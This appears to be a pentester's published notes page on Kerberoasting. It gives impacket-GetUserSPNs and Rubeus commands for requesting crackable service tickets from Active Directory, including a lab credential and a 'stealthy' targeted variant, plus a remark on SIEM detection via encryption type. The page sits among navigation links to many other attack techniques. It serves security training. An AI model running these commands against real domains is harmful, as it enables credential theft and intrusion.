📓 Jorkle's Notes

      • Breached Credentials Cheatsheet
      • directory-traversal
      • DNS Enumeration Cheatsheet
      • Internal Network Initial Access Cheatsheet
      • Linux Privilege Escalation Cheatsheet
      • People OSINT Cheatsheet
      • PowerView Cheatsheet
      • Search Engine OSINT Cheatsheet
      • SMB Enumeration Cheatsheet
      • ASREP Roasting
      • CONCEPT - What is DSRM?
      • Kerberos Authentication
      • kerberos-delegation
      • SCCM Knowledge for Pentesting Interviews
      • SCCM/MECM Basics
      • What is a Golden Ticket Attack?
              • WiFi (DoS) Deauthentication Attack
        • Foundations
        • IntelTechniques Search Tools
        • Am I Inside of a Docker Container?
        • ASREP Roasting
        • ASREQ-Roasting
        • Coercion to ADCS ESC8 Compromise
        • constrained-delegation
        • DCSYNC with SafetyKatz
        • Diamond Ticket
        • Discover Birthdays
        • Discover SMB Shares remotely
        • Discover Systems Recently Accessed By Compromised Machine
        • Download File With LOLBAS
        • Dump and Crack Kerberos Keys
        • Dump and Crack Kerberos Keys
        • Dump Domain Cached Credentials
        • Dump Google Chrome Passwords
        • Dump LSA Secrets
        • Dump LSASS Logon Passwords
        • Dump NTDS.dit
        • Dump PXE Passwords from Windows (No PXE Password Protection)
        • Dump SAM Database
        • Dump SAM Database from VM Virtual Hard Disk (VHD/VMDK)
        • Dump Windows Credential Manager
        • Enumerate Domain Shares
        • Enumerate OS Name and Version on Linux
        • Enumerate SCCM (MECM) using LDAP
        • Enumerate SMB Version
        • Enumerate Users and Groups via SMB
        • Enumerate Users using Kerberos
        • Enumerate Users With Kerberos PREAUTH Not Enabled
        • Enumerate Windows Firewall Configuration
        • Fetch Powershell History
        • Find Annual Company Reports
        • Find Company Information using CrunchBase
        • Find Interesting Files on Linux
        • Gather Company Email Addresses
        • Golden Ticket
        • Host Discovery
        • How to use PSRemoting with Enter-PSSession
        • Identify Domain Controllers
        • Identify if SCCM (MECM) is Present
        • Internal Port Scanning
        • kerberoasting
        • Kerberos Unconstrained Delegation
        • Load Powershell Scripts and Modules
        • Logon Script Persistence
        • mitm6-poisoning
        • Null/Anon & Guest SMB Auth
        • Obfuscate Powershell Scripts and Modules
        • Organization OSINT via SEC.GOV Edgar Filings
        • Over Pass The Hash
        • Persistence using DSRM Password
        • run-and-run-once-persistence
        • SCCM Computer Account SMB Relay Coercion to MSSQL Server Admi
        • Scheduled Task (Elevated) Persistence
        • Scheduled Task (Non Elevated) Persistence
        • Silver Ticket
        • Skeleton Key
        • SMB Relaying
        • Time Roasting
        • Windows Service Elevated Persistence
    Home

    ❯

    Techniques

    ❯

    kerberoasting

    kerberoasting

    Dec 15, 20251 min read

    • windows
    • active-directory

    Kerberoasting with Impacket-GetUserSPNs (Not Stealthy)

    Command

    impacket-GetUserSPNs north.sevenkingdoms.local/robb.stark:sexywolfy -target-domain north.sevenkingdoms.local -request

    [!example] Example

    Kerberoasting with Rubeus.exe (Not Stealthy)

    Command

    execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /format:hashcat /simple 

    Example

    INSERT_IMAGE_HERE

    Kerberoasting (targeted) with Rubeus.exe (Stealthy)

    Command

    execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /spn:MSSQLSvc/lon-sql-1.contoso.com:1433 /simple /nowrap 

    Example

    INSERT_IMAGE_HERE

    Example of the How Weak Encryption Type Can Giveaway Kerberoasting

    As visible in the screenshot below. Modern SIEM’S can filter for “TicketEncryptionType” that is associated with weaker encryption to detect Kerberoasting.

    Example of the Loudness of Kerberoasting Large Numbers of Users

    Related

    Related Notes

    All Related Notes

    TABLE file.ctime as "Created", tags as "Tags"
    FROM "New Notes"
    WHERE contains(tags, "windows") OR contains(tags, "active-directory")
    SORT file.ctime DESC

    windows

    TABLE file.ctime as "Created", tags as "Tags"
    FROM "New Notes"
    WHERE contains(tags, "windows")
    SORT file.ctime DESC

    active-directory

    TABLE file.ctime as "Created", tags as "Tags"
    FROM "New Notes"
    WHERE contains(tags, "active-directory")
    SORT file.ctime DESC

    Graph View

    Backlinks

    • Techniques
    • Blog
    • Contact
    • Gitrub
    • Linkedin